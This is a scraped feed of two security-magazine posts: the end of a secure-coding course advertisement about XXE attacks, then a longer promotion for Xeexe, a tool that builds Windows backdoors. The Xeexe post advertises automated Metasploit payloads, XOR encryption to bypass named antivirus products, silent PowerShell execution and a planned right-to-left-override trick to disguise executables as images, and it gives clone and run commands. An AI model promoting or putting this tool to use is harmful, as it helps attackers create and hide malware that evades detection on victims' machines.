• Project managers in security and commercial software houses - if you want to learn what your project needs in order to stay secure after you deploy it, and if you want to communicate effectively with developers and security experts on your team, this training will give you a well-rounded view of secure coding practices for web applications, as well as a deep understanding of web app attacks and defences.

Related content:

Web Application Attacks

Web Application Attacks and API Hacking (W51)

Web Apps Attack and Defense: Secure Coding (W49)

The post Preventing XXE Attacks [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.

Xeexe is a FUD exploiting tool which compiles a malware with famous payload, and then the compiled malware can be executed on Windows Xeexe Provides An Easy way to create Backdoors and Payload which can bypass TOP antivirus.

Features!

• python3 and Ngrok support.
• Automatically Xor encrypting with custom KEY that you can use for increasing bypass Av.
• Automatically Add Icon to executable.
• Automatically Add Manifest to executable.
• Bypass anti-virus backdoors with pure raw and xor.
• Support os windows 7 to windows 10.
• Fully Automating MSFvenom & Metasploit.
• custom icon (copy your icon to icon folder and rename it to icon.ico)
• add PowerShell to the silent executable.
• bypass Top Antivirus like BitDefender, Malwarebytes, Avast, ESET-NOD32, AVG,...

TO DO

• Add Right To Left unicode (Rtlo Attack) - Example: Xegpj.exe => Xeexe.jpg
• Add Random sign to Xeexe binary For Persistence FUD
• ...

Installation & How To Use

Instructions on how to install Xeexe

git clone https://github.com/persianhydra/Xeexe-TopAntivirusEvasion.git
cd Xeexe-TopAntivirusEvasion
chmod +x install.sh && ./install.sh
chmod +x Xeexe.py && python3 Xeexe.py

Requirements

• Metasploit Framework
• msfvenom
• Wine
• Mingw-w64 Compiler

Screenshot

More at: https://github.com/persianhydra/Xeexe-TopAntivirusEvasion

The post Xeexe - Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) appeared first on Hakin9 - IT Security Magazine.